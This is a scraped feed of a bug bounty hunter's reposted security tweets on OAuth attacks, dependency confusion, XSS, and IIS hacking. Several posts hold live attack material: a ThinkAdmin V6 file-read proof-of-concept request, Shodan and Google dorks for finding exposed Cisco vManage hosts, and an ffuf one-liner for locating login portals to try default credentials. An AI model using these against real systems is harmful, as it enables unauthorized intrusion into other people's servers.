hackeronee's profile picture. Hi

Rakesh Bugcrowd

@hackeronee

Hi

Rakesh Bugcrowd reposted

🍃 Are you stuck on authorization bypass in a Spring app? This tip can be helpful to you!

ptswarm's tweet image. 🍃 Are you stuck on authorization bypass in a Spring app?

This tip can be helpful to you!

Rakesh Bugcrowd reposted

I found a vulnerability in #Azure allowing me to access Azure accounts of companies worth billions We all know vulnerabilities exist. This isn't an injection, XSS, or RCE. But the crazy thing about it? It took 2 hours to discover. 🤯 Here's the story of #AutoWarp👇 (1/10)


Rakesh Bugcrowd reposted

Wordpress Plugin Update Confusion - The full guide on how to scan and mitigate the next Big Supply chain Attack galnagli.com/Wordpress_Plug… #BugBounty

galnagli's tweet image. Wordpress Plugin Update Confusion - The full guide on how to scan and mitigate the next Big Supply chain Attack

galnagli.com/Wordpress_Plug…

#BugBounty

Rakesh Bugcrowd reposted

4 years of college turned an extrovert into an introvert


Rakesh Bugcrowd reposted

A Thread about Blind XSS tips Pro Tip: Bookmark this tweet!


Rakesh Bugcrowd reposted

New attacks on OAuth: SSRF by design and Session Poisoning by @artsploit portswigger.net/research/hidde…


Rakesh Bugcrowd reposted

Is “STILL” your favourite triager? @Hacker0x01 #bugbounty #vote #bugbountylife


Rakesh Bugcrowd reposted

Bruh I was today years old when I found out Mac books did this 🤯


Rakesh Bugcrowd reposted

Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies 👇Check the thread after reading for a few bonus facts👇 medium.com/@alex.birsan/d…


Rakesh Bugcrowd reposted

ThinkAdmin V6 Readfile? 🧐 Poc: GET /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b2x322s2t3c1a342w34 Reference: mp.weixin.qq.com/s/3t7r7FCirDEA… issues: github.com/zoujingli/Thin…

pikpikcu's tweet image. ThinkAdmin V6 Readfile? 🧐

Poc:
GET /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b2x322s2t3c1a342w34

Reference:
mp.weixin.qq.com/s/3t7r7FCirDEA…
issues:
github.com/zoujingli/Thin…

Rakesh Bugcrowd reposted

Bug hunters: Be ready for the SD-WAN exploit to drop. Large companies use this. Payouts could be big! 😉 Google intitle:"Cisco vManage" intitle:"Viptela vManage" Shodan title:"Viptela vManage" title:"Cisco vManage" title:vManage http.favicon.hash:-904700687 ssl:"O=Viptela Inc"


Rakesh Bugcrowd reposted

Why I love hacking IIS servers: - Case insensitive, amazing for content discovery - IIS Shortname - VIEWSTATE deserialization RCE gadget - Web.config upload tricks - Debug mode w/ detailed stack traces and full path - Debugging scripts often deployed (ELMAH, Trace) - Telerik RCE


Rakesh Bugcrowd reposted

My new favorite way to find login portals and search for default credentials. So far VERY useful and quick! cat hosts.txt | httprobe -c 300 | ffuf -w - -u FUZZ -mr "assword"


Rakesh Bugcrowd reposted

#BugBounty The day that you start looking for critical bugs you mindset is going to change and you eventually going to find somenthing good, but if you keep using your time looking open redirects you won't never level up, this is going to take time, but it will worth #infosec


Rakesh Bugcrowd reposted

How it started - how it's going 🐚

intigriti's tweet image. How it started - how it's going 🐚

Loading...

Something went wrong.


Something went wrong.